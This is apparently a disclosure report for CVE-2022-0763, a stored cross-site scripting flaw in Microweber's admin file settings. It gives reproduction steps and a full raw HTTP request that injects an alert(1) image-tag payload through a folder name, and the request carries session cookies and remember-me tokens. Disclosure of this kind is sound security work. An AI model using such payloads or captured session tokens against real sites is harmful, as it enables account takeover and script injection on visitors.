Headline
CVE-2022-0763: Cross-site Scripting (XSS) - Stored in microweber
Cross-site Scripting (XSS) - Stored in GitHub repository microweber/microweber prior to 1.3.
Description
I found a Stored XSS vulnerability at admin page: https://demo.microweber.org/demo/admin/view:settings#option_group=files
Proof of Concept
Step 1: Go to Settings > Website settings > Files
Step 2: Create new folder with folder name : <img scr=0 onerror=alert(1)>
// Request
---------------------------------------
POST /demo/api/create_media_dir HTTP/1.1
Host: demo.microweber.org
Cookie: back_to_admin=https%3A//demo.microweber.org/demo/admin/view%3Asettings%23option_group%3Dfiles; csrf-token-data=%7B%22value%22%3A%22CWFoo1r5aSs0Eh43ggbPh7ZrADzLJq9pqxcn2oVo%22%2C%22expiry%22%3A1645524272281%7D; mw-back-to-live-edit=true; show-sidebar-layouts=0; laravel_session=pnfZUavpfYyBW2Nem7BpY0Ove87uyklKnGMAZgpA; remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=2%7CRrQ72IHSMWcZZ25VCSQGCbqyg25qhWmSDCJNwDVH4X3Z736hG3mxHR05oNrZ%7C%242y%2410%24114oPbqv.UAg3ca706prIuSTMe3pAc9qYqT2gOBR1uldB9UTk%2FlYu
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 60
Origin: https://demo.microweber.org
Referer: https://demo.microweber.org/demo/admin/view:settings
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
path=&name=%3Cimg+src%3D0+onerror%3Dalert(1)%3E&new_folder=1
---------------------------------------
Step3: After create folder successful, see alert popup
PoC:
Request: https://drive.google.com/file/d/1daorHwquywP3LPh6na5PIZzWb2lEL19W/view?usp=sharing
Alert popup: https://drive.google.com/file/d/1iTtAwQNHrpfktGHHXDrJ_7XPYlBOAHxe/view?usp=sharing
Impact
This vulnerability is capable of stored XSS